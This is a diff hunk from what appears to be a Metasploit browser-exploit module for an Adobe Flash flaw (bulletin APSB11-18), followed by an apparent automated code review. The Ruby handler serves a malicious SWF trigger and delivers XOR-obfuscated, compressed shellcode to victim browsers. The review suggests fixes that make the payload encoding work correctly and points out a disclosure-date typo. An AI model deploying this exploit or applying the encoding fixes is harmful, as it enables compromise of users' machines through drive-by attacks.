+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
+ send_not_found(cli)
+ return
+ end
+
+ xor_byte = 122
+ trigger = @swf
+ trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
+ code = rand_text_alpha(rand(6)+3) + ".txt"
+
+ sc = Zlib::Deflate.deflate(payload.encoded)
+ shellcode = ""
+
+ sc.each_byte do | c |
+ shellcode << (xor_byte ^ c)
+ end
+
+ uri = ((datastore['SSL']) ? "https://" : "http://")
+ uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+ uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"
+
+ bd_uri = Zlib::Deflate.deflate(uri)
+
+ uri = ""
+ bd_uri.each_byte do | c |
+ uri << (xor_byte ^ c)
+ end
+
+ bd_uri = uri.unpack("H*")[0]
+
+ obj_id = rand_text_alpha(rand(6)+3)
+
+ if request.uri.match(/\.swf/i)
+ print_status("Sending malicious swf")
+ send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
+ return
+ end
+
+ if request.uri.match(/\.txt/i)
+ print_status("Sending payload")
+ send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
+ return
+ end
+
+ html = <<-EOS
+
+
+
+
+
+
+
+
+
+
+
+
+
+ EOS
+
+ html = html.gsub(/^\t\t/, '')
+
+ print_status("Sending #{self.name} HTML")
+ send_response(cli, html, { 'Content-Type' => 'text/html' })
+ end
+end
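Review bot: The two XOR loops in `on_request_uri` (`shellcode << (xor_byte ^ c)` and `uri << (xor_byte ^ c)`) append an Integer to a String as a codepoint rather than a byte, so under a UTF-8 source encoding any result >= 0x80 is written as a multibyte sequence instead of the single XORed byte, and the file carries no `# -*- coding: binary -*-` header to pin the encoding. Building the strings with `shellcode = sc.each_byte.map { |c| xor_byte ^ c }.pack("C*")` and `uri = bd_uri.each_byte.map { |c| xor_byte ^ c }.pack("C*")` yields raw bytes regardless of encoding. `'DisclosureDate' => 'Jun 21 2012'` is a year later than the CVE identifier and the cited `Calendar/20110617` reference, which looks like a typo for 2011 and should be confirmed against the APSB11-18 bulletin. In `exploit`, the `fd = File.open( path, "rb" )` / `fd.read` / `fd.close` sequence leaks the handle if `read` raises; `@swf = File.open(path, "rb") { |f| f.read }` closes it on every path. As a point of style, the `.swf` early return could precede the payload encoding so that request does not generate a payload it never sends.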